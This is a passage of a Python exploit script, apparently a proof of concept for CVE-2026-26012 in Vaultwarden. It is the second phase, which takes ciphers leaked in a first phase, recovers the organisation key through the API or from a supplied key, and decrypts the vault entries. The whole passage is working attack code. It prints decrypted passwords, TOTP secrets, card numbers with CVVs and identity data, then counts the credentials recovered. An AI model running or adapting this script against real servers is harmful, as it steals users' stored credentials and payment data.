    field_type_names = {0: "Text", 1: "Hidden", 2: "Boolean", 3: "Linked"}

    def shown(value, placeholder="—"):
        return placeholder if value is None else value

    print(f"\n  ┌─ [{index}] {type_str}: {shown(cipher.get('name'), '?')}")
    print(f"  │  ID: {shown(cipher.get('id'), '?')}")
    print(f"  │  Collections: {cipher.get('collectionIds', [])}")

    notes = cipher.get("notes")
    if notes:
        if len(notes) > 100:
            notes = notes[:100] + "..."
        print(f"  │  Notes: {notes}")

    if ctype == 1 and cipher.get("login"):
        login = cipher["login"]
        print("  │  ┌─ Login")
        for uri in login.get("uris") or []:
            if uri:
                print(f"  │  │  URL:      {uri}")
        print(f"  │  │  Username: {shown(login.get('username'))}")
        print(f"  │  │  Password: {shown(login.get('password'))}")
        if login.get("totp"):
            print(f"  │  │  TOTP:     {login['totp']}")
        print("  │  └─")

    elif ctype == 3 and cipher.get("card"):
        card = cipher["card"]
        print("  │  ┌─ Card")
        print(f"  │  │  Holder: {shown(card.get('cardholderName'))}")
        print(f"  │  │  Brand:  {shown(card.get('brand'))}")
        print(f"  │  │  Number: {shown(card.get('number'))}")
        print(f"  │  │  Exp:    {shown(card.get('expMonth'), '?')}/{shown(card.get('expYear'), '?')}")
        print(f"  │  │  CVV:    {shown(card.get('code'))}")
        print("  │  └─")

    elif ctype == 4 and cipher.get("identity"):
        ident = cipher["identity"]
        print("  │  ┌─ Identity")
        for k, v in ident.items():
            # Skip empty values and decryption-error markers; the marker is a
            # prefix ("[DECRYPT_ERROR: ...]"), so equality never matched.
            if v and not str(v).startswith("[DECRYPT_ERROR"):
                print(f"  │  │  {k}: {v}")
        print("  │  └─")

    if cipher.get("fields"):
        print("  │  ┌─ Custom fields")
        for f in cipher["fields"]:
            fname = shown(f.get("name"), "?")
            fval = shown(f.get("value"))
            ftype = f.get("type", 0)
            print(f"  │  │  [{field_type_names.get(ftype, '?')}] {fname} = {fval}")
        print("  │  └─")

    if cipher.get("attachments"):
        print("  │  Attachments:")
        for att in cipher["attachments"]:
            print(f"  │    - {shown(att.get('fileName'), '?')} ({shown(att.get('sizeName'), '?')})")

    print("  └─")


# ═════════════════════════════════════════════
# 8. Main
# ═════════════════════════════════════════════

def main():
    banner = r"""
   ╔══════════════════════════════════════════════════════════╗
   ║   CVE-2026-26012 — Phase 2: Decrypt Leaked Ciphers      ║
   ║   Org Key Recovery + AES-256-CBC Decryption              ║
   ╚══════════════════════════════════════════════════════════╝
    """
    print(banner)

    parser = argparse.ArgumentParser(
        description="CVE-2026-26012 Phase 2: Org key recovery & cipher decryption",
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )

    # Input: leaked ciphers
    parser.add_argument("--leaked-json", required=True,
                        help="JSON file from Phase 1 (--output results.json)")

    # Method A: Full chain (API + master password)
    chain = parser.add_argument_group("Method A: Full recovery chain (API + master password)")
    chain.add_argument("--url", help="Vaultwarden base URL")
    chain.add_argument("--token", help="Bearer token")
    chain.add_argument("--cookie", help="Session cookie")
    chain.add_argument("--email", help="Account email")
    chain.add_argument("--master-password", help="Master password (for key derivation)")
    chain.add_argument("--org-id", help="Target organization UUID")
    chain.add_argument("--no-verify-ssl", action="store_true",
                        help="Skip SSL verification")

    # Method B: Direct org key
    direct = parser.add_argument_group("Method B: Direct org key (skip recovery)")
    direct.add_argument("--org-key-hex",
                        help="Organization key as hex (128 hex chars = 64 bytes: enc||mac)")

    # Output
    parser.add_argument("--output", help="Save decrypted results to JSON file")
    parser.add_argument("--max-display", type=int, default=30,
                        help="Max ciphers to display (default: 30)")
    parser.add_argument("--debug", action="store_true",
                        help="Show detailed intermediate values for troubleshooting")

    args = parser.parse_args()

    # ── Load leaked ciphers ──
    print(f"[*] Loading leaked ciphers from {args.leaked_json}...")
    with open(args.leaked_json, "r") as f:
        leaked_data = json.load(f)

    # Handle both Phase 1 export format and raw cipher arrays
    if isinstance(leaked_data, dict):
        ciphers = leaked_data.get("leaked_ciphers", [])
        print(f"    Source: {leaked_data.get('target', '?')}")
        print(f"    Org:    {leaked_data.get('organization_id', '?')}")
    elif isinstance(leaked_data, list):
        ciphers = leaked_data
    else:
        print("[!] Unrecognized JSON format")
        sys.exit(1)

    print(f"    Loaded {len(ciphers)} cipher(s) to decrypt")

    if not ciphers:
        print("[!] No ciphers to decrypt.")
        sys.exit(0)

    # ── Obtain org key ──
    org_enc = None
    org_mac = None

    if args.org_key_hex:
        # Method B: direct key
        print(f"\n[*] Using provided organization key")
        raw = bytes.fromhex(args.org_key_hex)
        if len(raw) != 64:
            print(f"[!] Org key must be 64 bytes (128 hex chars), got {len(raw)}")
            sys.exit(1)
        org_enc, org_mac = raw[:32], raw[32:]
        print(f"    Org enc key: {org_enc[:4].hex()}...")
        print(f"    Org mac key: {org_mac[:4].hex()}...")

    elif args.url and args.master_password and args.email:
        # Method A: full chain
        client = VWClient(args.url, verify_ssl=not args.no_verify_ssl)
        if args.token:
            client.set_bearer_token(args.token)
        elif args.cookie:
            client.set_cookie(args.cookie)
        else:
            print("[!] Need --token or --cookie for API access")
            sys.exit(1)

        org_id = args.org_id
        if not org_id:
            # Try to get from the leaked JSON
            org_id = leaked_data.get("organization_id") if isinstance(leaked_data, dict) else None
        if not org_id:
            print("[!] --org-id is required for Method A")
            sys.exit(1)

        org_enc, org_mac = recover_org_key(client, args.email, args.master_password, org_id,
                                            debug=args.debug)

    else:
        print("[!] Provide either:")
        print("    Method A: --url + --token + --email + --master-password + --org-id")
        print("    Method B: --org-key-hex")
        sys.exit(1)

    # ── Decrypt all ciphers ──
    print(f"\n[*] Decrypting {len(ciphers)} cipher(s)...\n")

    decrypted = []
    errors = 0
    for i, cipher in enumerate(ciphers):
        try:
            dec = decrypt_cipher(cipher, org_enc, org_mac)
            decrypted.append(dec)
        except Exception as e:
            errors += 1
            dec = {
                "id": cipher.get("id", cipher.get("Id")),
                "error": str(e),
            }
            decrypted.append(dec)

    # ── Display results ──
    print(f"{'='*60}")
    print(f"  DECRYPTION RESULTS")
    print(f"{'='*60}")
    print(f"  Total:     {len(ciphers)}")
    print(f"  Decrypted: {len(decrypted) - errors}")
    print(f"  Errors:    {errors}")
    print(f"{'='*60}")

    # Count by type
    type_counts = {}
    for d in decrypted:
        if "error" not in d:
            t = TYPE_NAMES.get(d.get("type"), "Unknown")
            type_counts[t] = type_counts.get(t, 0) + 1

    print(f"\n  Breakdown:")
    for t, count in sorted(type_counts.items()):
        print(f"    {t}: {count}")

    # Print decrypted ciphers
    display_count = min(len(decrypted), args.max_display)
    for i, dec in enumerate(decrypted[:display_count], 1):
        if "error" in dec:
            print(f"\n  [{i}] ERROR: {dec['error']} (cipher {dec.get('id', '?')})")
        else:
            print_decrypted_cipher(dec, i)

    if len(decrypted) > display_count:
        print(f"\n  ... and {len(decrypted) - display_count} more. Use --output to see all.")

    # ── Export ──
    if args.output:
        export = {
            "vulnerability": "CVE-2026-26012",
            "phase": "decryption",
            "total_ciphers": len(ciphers),
            "decrypted_count": len(decrypted) - errors,
            "error_count": errors,
            "org_key_enc_hex": org_enc.hex(),
            "org_key_mac_hex": org_mac.hex(),
            "decrypted_ciphers": decrypted,
        }
        with open(args.output, "w") as f:
            json.dump(export, f, indent=2, ensure_ascii=False)
        print(f"\n[+] Decrypted results saved to {args.output}")

    # ── Summary ──
    passwords = sum(1 for d in decrypted if d.get("login", {}).get("password"))
    totps = sum(1 for d in decrypted if d.get("login", {}).get("totp"))
    cards = sum(1 for d in decrypted if d.get("card", {}).get("number"))

    print(f"\n{'='*60}")
    print(f"  IMPACT SUMMARY")
    print(f"{'='*60}")
    print(f"  Passwords recovered:     {passwords}")
    print(f"  TOTP secrets recovered:  {totps}")
    print(f"  Card numbers recovered:  {cards}")
    print(f"{'='*60}")

    print("\n[*] Done.")
    return 0


if __name__ == "__main__":
    # Script entry point: main()'s return value becomes the process exit status.
    raise SystemExit(main())
